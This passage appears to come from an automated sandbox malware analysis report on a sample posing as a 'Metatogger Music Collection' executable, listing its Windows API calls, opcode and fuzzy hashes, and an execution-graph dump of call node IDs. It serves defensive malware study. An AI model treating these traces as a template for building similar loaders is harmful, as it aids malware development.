                                                                            • Opcode Fuzzy Hash: b6dd7ce0089c197cf693ca265a150b89f405fd2be0e3a5b5ca2c0cc9865f6c54
                                                                            • Instruction Fuzzy Hash: 5531E5B2A012186FEF20E760DE49FDA336CEF85304F1005BBF945B61D0D6B89E548A19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404710 Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040472B
                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040473F
                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040476B
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047A3
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047C5
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047DE
                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 004047F1
                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040482F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                            • String ID:
                                                                            • API String ID: 1823725401-0
                                                                            • Opcode ID: 3561de5b01a372d6e215d3622bd3220d2b84138c13fabd42e705c73002b4d0d2
                                                                            • Instruction ID: 34ba4f5269201e1e594d4a21fe80140370f79d481ab45775fabf70a7e665ef6c
                                                                            • Opcode Fuzzy Hash: 3561de5b01a372d6e215d3622bd3220d2b84138c13fabd42e705c73002b4d0d2
                                                                            • Instruction Fuzzy Hash: E631C2F75042656FD7207FB99D8483BB69CE6C6358716093BFB42F3280D7798C4182AA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401F64 Relevance: 12.1, APIs: 8, Instructions: 121memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                            • GetLastError.KERNEL32 ref: 00401F86
                                                                            • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                            • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                            • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                            • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
                                                                            • GetTickCount.KERNEL32 ref: 00401FFB
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                            • String ID:
                                                                            • API String ID: 564119183-0
                                                                            • Opcode ID: d2a57f7cc8f0d0fe454428983335f0199e5147479bb7e2a898d268b80a50adbf
                                                                            • Instruction ID: cd0a89f7906a11fa59f7c630caffefac6273cd55dd9fd3e2fc017d6917677aa9
                                                                            • Opcode Fuzzy Hash: d2a57f7cc8f0d0fe454428983335f0199e5147479bb7e2a898d268b80a50adbf
                                                                            • Instruction Fuzzy Hash: DB312971A40251AFDB109FB99E489AF7B78EF49344B10807AFA46F7281D6748941C7A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405D6E Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetStringTypeW.KERNEL32(00000001,004065FC,00000001,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DAD
                                                                            • GetStringTypeA.KERNEL32(00000000,00000001,004065F8,00000001,?,?,00000000,00000000,00000001), ref: 00405DC7
                                                                            • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DFB
                                                                            • MultiByteToWideChar.KERNEL32(00404E93,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E33
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E89
                                                                            • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E9B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: StringType$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 3852931651-0
                                                                            • Opcode ID: 299ca15397ebee838ff06567ddbc0ab6f29b8118cf23d418261883c500b25a22
                                                                            • Instruction ID: 80e02ee10c910d5558e83bb499fc0990029bfad3b9a08e1f349c60d3d592f295
                                                                            • Opcode Fuzzy Hash: 299ca15397ebee838ff06567ddbc0ab6f29b8118cf23d418261883c500b25a22
                                                                            • Instruction Fuzzy Hash: D5416C72540619AFCF109FA4DD85AAF3F69FB08710F10443AF912F6290C3399A619BA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403112 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetVersionExA.KERNEL32 ref: 00403131
                                                                            • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403166
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004031C6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentFileModuleNameVariableVersion
                                                                            • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                            • API String ID: 1385375860-4131005785
                                                                            • Opcode ID: af41626222cda295a30e89e95e8c01aa69820a81ffba76c46a2f88c2c2cc9610
                                                                            • Instruction ID: 15aa791d7551e4111e6245bb3a1b8270ecaa7052e860947edacf4d8c3684a0cc
                                                                            • Opcode Fuzzy Hash: af41626222cda295a30e89e95e8c01aa69820a81ffba76c46a2f88c2c2cc9610
                                                                            • Instruction Fuzzy Hash: 9C3102719412486DEB31AB706C45BDA7F6C9B0A709F2404FFD145FA2C2D6398F898B19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404842 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetStartupInfoA.KERNEL32(?), ref: 0040489B
                                                                            • GetFileType.KERNEL32(00000800), ref: 00404941
                                                                            • GetStdHandle.KERNEL32(-000000F6), ref: 0040499A
                                                                            • GetFileType.KERNEL32(00000000), ref: 004049A8
                                                                            • SetHandleCount.KERNEL32 ref: 004049DF
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: FileHandleType$CountInfoStartup
                                                                            • String ID:
                                                                            • API String ID: 1710529072-0
                                                                            • Opcode ID: 56d6159c8425f0dd02e5a81d6ebd8f1304acda9888bee5980fecee2fba5d3342
                                                                            • Instruction ID: 5bba43567eb9c7eebad7166e054eef6f33a3e935d61c9f19950f113686a4cc82
                                                                            • Opcode Fuzzy Hash: 56d6159c8425f0dd02e5a81d6ebd8f1304acda9888bee5980fecee2fba5d3342
                                                                            • Instruction Fuzzy Hash: 585124F25003118BD7208B38CD48B673BA0EB91331F19873AE696BB2E1D738C855875A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403B08 Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,004032A0), ref: 00403B29
                                                                            • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,004032A0), ref: 00403B4D
                                                                            • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,004032A0), ref: 00403B67
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,004032A0), ref: 00403C28
                                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,004032A0), ref: 00403C3F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual$FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 714016831-0
                                                                            • Opcode ID: 2f654d351822ba0938a426815c3a9789615761df562ee039fb8b9cb046954d4c
                                                                            • Instruction ID: 29c7c306398b504596bf767bafbbf3f0594b5aced9f79ae4ff8fd419923c464c
                                                                            • Opcode Fuzzy Hash: 2f654d351822ba0938a426815c3a9789615761df562ee039fb8b9cb046954d4c
                                                                            • Instruction Fuzzy Hash: 6831F071A447019BE3208F24DD45B22BFB8EB44B5AF10813AE566BB3D1E778B9008B5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004056B6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCPInfo.KERNEL32(?,00000000), ref: 004056CA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Info
                                                                            • String ID: $
                                                                            • API String ID: 1807457897-3032137957
                                                                            • Opcode ID: cf78403d1ad84891bd07750a5396902b39d4e3a867152e43ede0f354584f907c
                                                                            • Instruction ID: 09f2f023d99f136d6c1d54f1ac7197ff319f79a86c6e1a8e0271cc1bcc75f35e
                                                                            • Opcode Fuzzy Hash: cf78403d1ad84891bd07750a5396902b39d4e3a867152e43ede0f354584f907c
                                                                            • Instruction Fuzzy Hash: 474156310047586AEB15D614DE5DBFB7FA9EB02700F1400F6E946F71D2C2790924DFAA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004044C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe,00000104,?,00000000,?,?,?,?,00402FB0), ref: 004044E6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: FileModuleName
                                                                            • String ID: 6i$C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                            • API String ID: 514040917-2770887855
                                                                            • Opcode ID: e4c2509f1a48c11c220fc4324a28902978b1387e4841e844e69e582ca8f90123
                                                                            • Instruction ID: a353362e766ed3f2c716cac6d89b577610a1520323eec6d1a1738d9fa524379f
                                                                            • Opcode Fuzzy Hash: e4c2509f1a48c11c220fc4324a28902978b1387e4841e844e69e582ca8f90123
                                                                            • Instruction Fuzzy Hash: B2115EB2900218BFD711EF99DD81CAB77BCEB45358B1100BBF605B3241E674AE148BA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040395C Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 00403984
                                                                            • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039B8
                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039D2
                                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: AllocHeap$FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 3499195154-0
                                                                            • Opcode ID: d387fd4f3eab095a78f7bb9c90f865f0c98a2a282a57ddd88524d606926be08d
                                                                            • Instruction ID: ab7933d84ada2b962503ad88361c81f9e178ef349f2d38840b4e325d6782f2f4
                                                                            • Opcode Fuzzy Hash: d387fd4f3eab095a78f7bb9c90f865f0c98a2a282a57ddd88524d606926be08d
                                                                            • Instruction Fuzzy Hash: 3E118F712003019FD7218F29EE459167BF5FB84765711853AF152E71B0C372D961CF1A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:9.1%
                                                                            Dynamic/Decrypted Code Coverage:83.9%
                                                                            Signature Coverage:2.5%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:40
                                                                            execution_graph 18652 2ad104d 18657 2ae32e7 18652->18657 18663 2ae31eb 18657->18663 18659 2ad1057 18660 2ad1aa9 InterlockedIncrement 18659->18660 18661 2ad105c 18660->18661 18662 2ad1ac5 WSAStartup InterlockedExchange 18660->18662 18662->18661 18664 2ae31f7 ___BuildCatchObject 18663->18664 18671 2ae84d2 18664->18671 18670 2ae321e ___BuildCatchObject 18670->18659 18688 2ae882d 18671->18688 18673 2ae3200 18674 2ae322f RtlDecodePointer RtlDecodePointer 18673->18674 18675 2ae320c 18674->18675 18676 2ae325c 18674->18676 18685 2ae3229 18675->18685 18676->18675 18987 2ae909d 18676->18987 18678 2ae32bf RtlEncodePointer RtlEncodePointer 18678->18675 18679 2ae326e 18679->18678 18680 2ae3293 18679->18680 18994 2ae8a3b 18679->18994 18680->18675 18682 2ae8a3b __realloc_crt 62 API calls 18680->18682 18684 2ae32ad RtlEncodePointer 18680->18684 18683 2ae32a7 18682->18683 18683->18675 18683->18684 18684->18678 19021 2ae84db 18685->19021 18689 2ae883e 18688->18689 18690 2ae8851 RtlEnterCriticalSection 18688->18690 18695 2ae88b5 18689->18695 18690->18673 18692 2ae8844 18692->18690 18717 2ae837f 18692->18717 18696 2ae88c1 ___BuildCatchObject 18695->18696 18697 2ae88e0 18696->18697 18724 2ae8613 18696->18724 18705 2ae8903 ___BuildCatchObject 18697->18705 18771 2ae89f4 18697->18771 18703 2ae88fe 18776 2ae5d9b 18703->18776 18704 2ae890d 18709 2ae882d __lock 59 API calls 18704->18709 18705->18692 18706 2ae88d6 18768 2ae825c 18706->18768 18710 2ae8914 18709->18710 18711 2ae8939 18710->18711 18712 2ae8921 18710->18712 18782 2ae2eb4 18711->18782 18779 2ae914c 18712->18779 18715 2ae892d 18788 2ae8955 18715->18788 18718 2ae8613 __FF_MSGBANNER 59 API calls 18717->18718 18719 2ae8387 18718->18719 18720 2ae8670 __NMSG_WRITE 59 API calls 18719->18720 18721 2ae838f 18720->18721 18957 2ae842e 18721->18957 18791 2af00be 18724->18791 18726 2ae861a 18728 2af00be __FF_MSGBANNER 59 API calls 18726->18728 18730 2ae8627 18726->18730 18727 2ae8670 __NMSG_WRITE 59 API calls 18729 2ae863f 18727->18729 18728->18730 18732 2ae8670 __NMSG_WRITE 59 API calls 18729->18732 18730->18727 18731 2ae8649 18730->18731 18733 2ae8670 18731->18733 18732->18731 18734 2ae868e __NMSG_WRITE 18733->18734 18735 2af00be __FF_MSGBANNER 55 API calls 18734->18735 18767 2ae87b5 18734->18767 18737 2ae86a1 18735->18737 18739 2ae87ba GetStdHandle 18737->18739 18740 2af00be __FF_MSGBANNER 55 API calls 18737->18740 18738 2ae881e 18738->18706 18743 2ae87c8 _strlen 18739->18743 18739->18767 18741 2ae86b2 18740->18741 18741->18739 18742 2ae86c4 18741->18742 18742->18767 18813 2aef47d 18742->18813 18745 2ae8801 WriteFile 18743->18745 18743->18767 18745->18767 18747 2ae8822 18750 2ae4e45 __invoke_watson 8 API calls 18747->18750 18748 2ae86f1 GetModuleFileNameW 18749 2ae8711 18748->18749 18753 2ae8721 __NMSG_WRITE 18748->18753 18751 2aef47d __NMSG_WRITE 55 API calls 18749->18751 18752 2ae882c 18750->18752 18751->18753 18755 2ae8851 RtlEnterCriticalSection 18752->18755 18756 2ae88b5 __mtinitlocknum 55 API calls 18752->18756 18753->18747 18754 2ae8767 18753->18754 18822 2aef4f2 18753->18822 18754->18747 18831 2aef411 18754->18831 18755->18706 18758 2ae8844 18756->18758 18758->18755 18761 2ae837f __amsg_exit 55 API calls 18758->18761 18763 2ae8850 18761->18763 18762 2aef411 __NMSG_WRITE 55 API calls 18764 2ae879e 18762->18764 18763->18755 18764->18747 18765 2ae87a5 18764->18765 18840 2af00fe RtlEncodePointer 18765->18840 18865 2ae448b 18767->18865 18880 2ae8228 GetModuleHandleExW 18768->18880 18775 2ae8a02 18771->18775 18773 2ae88f7 18773->18703 18773->18704 18775->18773 18883 2ae2eec 18775->18883 18900 2ae9445 Sleep 18775->18900 18903 2ae5bb2 GetLastError 18776->18903 18778 2ae5da0 18778->18705 18780 2ae9169 InitializeCriticalSectionAndSpinCount 18779->18780 18781 2ae915c 18779->18781 18780->18715 18781->18715 18783 2ae2ebd HeapFree 18782->18783 18784 2ae2ee6 _free 18782->18784 18783->18784 18785 2ae2ed2 18783->18785 18784->18715 18786 2ae5d9b __read_nolock 57 API calls 18785->18786 18787 2ae2ed8 GetLastError 18786->18787 18787->18784 18956 2ae8997 RtlLeaveCriticalSection 18788->18956 18790 2ae895c 18790->18705 18792 2af00c8 18791->18792 18793 2af00d2 18792->18793 18794 2ae5d9b __read_nolock 59 API calls 18792->18794 18793->18726 18795 2af00ee 18794->18795 18798 2ae4e35 18795->18798 18801 2ae4e0a RtlDecodePointer 18798->18801 18802 2ae4e1d 18801->18802 18807 2ae4e45 IsProcessorFeaturePresent 18802->18807 18805 2ae4e0a __read_nolock 8 API calls 18806 2ae4e41 18805->18806 18806->18726 18808 2ae4e50 18807->18808 18809 2ae4cd8 __call_reportfault 7 API calls 18808->18809 18810 2ae4e65 18809->18810 18811 2ae9453 ___raise_securityfailure GetCurrentProcess TerminateProcess 18810->18811 18812 2ae4e34 18811->18812 18812->18805 18814 2aef496 18813->18814 18815 2aef488 18813->18815 18816 2ae5d9b __read_nolock 59 API calls 18814->18816 18815->18814 18820 2aef4af 18815->18820 18817 2aef4a0 18816->18817 18818 2ae4e35 __read_nolock 9 API calls 18817->18818 18819 2ae86e4 18818->18819 18819->18747 18819->18748 18820->18819 18821 2ae5d9b __read_nolock 59 API calls 18820->18821 18821->18817 18826 2aef500 18822->18826 18823 2aef504 18824 2aef509 18823->18824 18825 2ae5d9b __read_nolock 59 API calls 18823->18825 18824->18754 18827 2aef534 18825->18827 18826->18823 18826->18824 18829 2aef543 18826->18829 18828 2ae4e35 __read_nolock 9 API calls 18827->18828 18828->18824 18829->18824 18830 2ae5d9b __read_nolock 59 API calls 18829->18830 18830->18827 18832 2aef42b 18831->18832 18835 2aef41d 18831->18835 18833 2ae5d9b __read_nolock 59 API calls 18832->18833 18834 2aef435 18833->18834 18836 2ae4e35 __read_nolock 9 API calls 18834->18836 18835->18832 18838 2aef457 18835->18838 18837 2ae8787 18836->18837 18837->18747 18837->18762 18838->18837 18839 2ae5d9b __read_nolock 59 API calls 18838->18839 18839->18834 18841 2af0132 ___crtIsPackagedApp 18840->18841 18842 2af01f1 IsDebuggerPresent 18841->18842 18843 2af0141 LoadLibraryExW 18841->18843 18846 2af01fb 18842->18846 18847 2af0216 18842->18847 18844 2af017e GetProcAddress 18843->18844 18845 2af0158 GetLastError 18843->18845 18849 2af0192 7 API calls 18844->18849 18855 2af020e 18844->18855 18848 2af0167 LoadLibraryExW 18845->18848 18845->18855 18850 2af0209 18846->18850 18851 2af0202 OutputDebugStringW 18846->18851 18847->18850 18852 2af021b RtlDecodePointer 18847->18852 18848->18844 18848->18855 18853 2af01ee 18849->18853 18854 2af01da GetProcAddress RtlEncodePointer 18849->18854 18850->18855 18856 2af0242 RtlDecodePointer RtlDecodePointer 18850->18856 18863 2af025a 18850->18863 18851->18850 18852->18855 18853->18842 18854->18853 18859 2ae448b _strtok 6 API calls 18855->18859 18856->18863 18857 2af027e RtlDecodePointer 18857->18855 18858 2af0292 RtlDecodePointer 18858->18857 18861 2af0299 18858->18861 18862 2af02e0 18859->18862 18861->18857 18864 2af02aa RtlDecodePointer 18861->18864 18862->18767 18863->18857 18863->18858 18864->18857 18866 2ae4495 IsProcessorFeaturePresent 18865->18866 18867 2ae4493 18865->18867 18869 2ae94cf 18866->18869 18867->18738 18872 2ae947e IsDebuggerPresent 18869->18872 18873 2ae9493 ___raise_securityfailure 18872->18873 18878 2ae9468 SetUnhandledExceptionFilter UnhandledExceptionFilter 18873->18878 18876 2ae949b ___raise_securityfailure 18879 2ae9453 GetCurrentProcess TerminateProcess 18876->18879 18877 2ae94b8 18877->18738 18878->18876 18879->18877 18881 2ae8253 ExitProcess 18880->18881 18882 2ae8241 GetProcAddress 18880->18882 18882->18881 18884 2ae2f67 18883->18884 18891 2ae2ef8 18883->18891 18885 2ae8143 _malloc RtlDecodePointer 18884->18885 18886 2ae2f6d 18885->18886 18888 2ae5d9b __read_nolock 58 API calls 18886->18888 18887 2ae8613 __FF_MSGBANNER 58 API calls 18897 2ae2f03 18887->18897 18899 2ae2f5f 18888->18899 18889 2ae2f2b RtlAllocateHeap 18889->18891 18889->18899 18890 2ae8670 __NMSG_WRITE 58 API calls 18890->18897 18891->18889 18892 2ae2f53 18891->18892 18896 2ae2f51 18891->18896 18891->18897 18901 2ae8143 RtlDecodePointer 18891->18901 18894 2ae5d9b __read_nolock 58 API calls 18892->18894 18894->18896 18895 2ae825c __mtinitlocknum 3 API calls 18895->18897 18898 2ae5d9b __read_nolock 58 API calls 18896->18898 18897->18887 18897->18890 18897->18891 18897->18895 18898->18899 18899->18775 18900->18775 18902 2ae8156 18901->18902 18902->18891 18917 2ae910b 18903->18917 18905 2ae5bc7 18906 2ae5c15 SetLastError 18905->18906 18920 2ae89ac 18905->18920 18906->18778 18910 2ae5bee 18911 2ae5c0c 18910->18911 18912 2ae5bf4 18910->18912 18914 2ae2eb4 _free 56 API calls 18911->18914 18929 2ae5c21 18912->18929 18916 2ae5c12 18914->18916 18915 2ae5bfc GetCurrentThreadId 18915->18906 18916->18906 18918 2ae9122 TlsGetValue 18917->18918 18919 2ae911e 18917->18919 18918->18905 18919->18905 18923 2ae89b3 18920->18923 18922 2ae5bda 18922->18906 18926 2ae912a 18922->18926 18923->18922 18925 2ae89d1 18923->18925 18939 2af03f8 18923->18939 18925->18922 18925->18923 18947 2ae9445 Sleep 18925->18947 18927 2ae9144 TlsSetValue 18926->18927 18928 2ae9140 18926->18928 18927->18910 18928->18910 18930 2ae5c2d ___BuildCatchObject 18929->18930 18931 2ae882d __lock 59 API calls 18930->18931 18932 2ae5c6a 18931->18932 18948 2ae5cc2 18932->18948 18935 2ae882d __lock 59 API calls 18936 2ae5c8b ___addlocaleref 18935->18936 18951 2ae5ccb 18936->18951 18938 2ae5cb6 ___BuildCatchObject 18938->18915 18940 2af0403 18939->18940 18944 2af041e 18939->18944 18941 2af040f 18940->18941 18940->18944 18942 2ae5d9b __read_nolock 58 API calls 18941->18942 18945 2af0414 18942->18945 18943 2af042e RtlAllocateHeap 18943->18944 18943->18945 18944->18943 18944->18945 18946 2ae8143 _malloc RtlDecodePointer 18944->18946 18945->18923 18946->18944 18947->18925 18954 2ae8997 RtlLeaveCriticalSection 18948->18954 18950 2ae5c84 18950->18935 18955 2ae8997 RtlLeaveCriticalSection 18951->18955 18953 2ae5cd2 18953->18938 18954->18950 18955->18953 18956->18790 18960 2ae84e4 18957->18960 18959 2ae839a 18961 2ae84f0 ___BuildCatchObject 18960->18961 18962 2ae882d __lock 52 API calls 18961->18962 18963 2ae84f7 18962->18963 18964 2ae85b0 _doexit 18963->18964 18965 2ae8525 RtlDecodePointer 18963->18965 18980 2ae85fe 18964->18980 18965->18964 18967 2ae853c RtlDecodePointer 18965->18967 18970 2ae854c 18967->18970 18969 2ae860d ___BuildCatchObject 18969->18959 18970->18964 18972 2ae8559 RtlEncodePointer 18970->18972 18976 2ae8569 RtlDecodePointer RtlEncodePointer 18970->18976 18972->18970 18973 2ae85f5 18974 2ae825c __mtinitlocknum 3 API calls 18973->18974 18975 2ae85fe 18974->18975 18977 2ae860b 18975->18977 18985 2ae8997 RtlLeaveCriticalSection 18975->18985 18978 2ae857b RtlDecodePointer RtlDecodePointer 18976->18978 18977->18959 18978->18970 18981 2ae85de 18980->18981 18982 2ae8604 18980->18982 18981->18969 18984 2ae8997 RtlLeaveCriticalSection 18981->18984 18986 2ae8997 RtlLeaveCriticalSection 18982->18986 18984->18973 18985->18977 18986->18981 18988 2ae90bb RtlSizeHeap 18987->18988 18989 2ae90a6 18987->18989 18988->18679 18990 2ae5d9b __read_nolock 59 API calls 18989->18990 18991 2ae90ab 18990->18991 18992 2ae4e35 __read_nolock 9 API calls 18991->18992 18993 2ae90b6 18992->18993 18993->18679 18997 2ae8a42 18994->18997 18996 2ae8a7f 18996->18680 18997->18996 18999 2af02e4 18997->18999 19020 2ae9445 Sleep 18997->19020 19000 2af02ed 18999->19000 19001 2af02f8 18999->19001 19002 2ae2eec _malloc 59 API calls 19000->19002 19003 2af0300 19001->19003 19011 2af030d 19001->19011 19005 2af02f5 19002->19005 19004 2ae2eb4 _free 59 API calls 19003->19004 19019 2af0308 _free 19004->19019 19005->18997 19006 2af0345 19008 2ae8143 _malloc RtlDecodePointer 19006->19008 19007 2af0315 RtlReAllocateHeap 19007->19011 19007->19019 19009 2af034b 19008->19009 19012 2ae5d9b __read_nolock 59 API calls 19009->19012 19010 2af0375 19014 2ae5d9b __read_nolock 59 API calls 19010->19014 19011->19006 19011->19007 19011->19010 19013 2ae8143 _malloc RtlDecodePointer 19011->19013 19016 2af035d 19011->19016 19012->19019 19013->19011 19015 2af037a GetLastError 19014->19015 19015->19019 19017 2ae5d9b __read_nolock 59 API calls 19016->19017 19018 2af0362 GetLastError 19017->19018 19018->19019 19019->18997 19020->18997 19024 2ae8997 RtlLeaveCriticalSection 19021->19024 19023 2ae322e 19023->18670 19024->19023 19025 2b15af3 19026 2b255dc CreateFileA 19025->19026 19027 2b627c6 19026->19027 19028 402322 19033 2ae3c52 19028->19033 19031 40b93b 19034 2ae3c5b 19033->19034 19035 2ae3c60 19033->19035 19047 2aeb821 19034->19047 19039 2ae3c75 19035->19039 19038 402324 Sleep 19038->19031 19040 2ae3c81 ___BuildCatchObject 19039->19040 19044 2ae3ccf ___DllMainCRTStartup 19040->19044 19046 2ae3d2c ___BuildCatchObject 